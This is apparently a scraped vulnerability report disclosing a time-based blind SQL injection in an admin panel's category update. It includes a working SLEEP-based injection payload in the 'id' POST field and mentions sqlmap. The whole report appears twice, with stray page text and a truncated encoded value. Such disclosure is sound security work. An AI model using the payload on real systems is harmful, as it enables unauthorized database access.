Log in to the background as the default account admin.
We click in order and grab packets:
There is a time-based blind SQL injection vulnerability in the location of id.
POC: http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:
Save the HTTP request package as a file .
Test using the SQLMap tool :
The text was updated successfully, but these errors were encountered:
Log in to the background as the default account admin.






We click in order and grab packets:
There is a time-based blind SQL injection vulnerability in the location of id.
POC:
http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:


Save the HTTP request package as a file .
Test using the SQLMap tool :
The text was updated successfully, but these errors were encountered: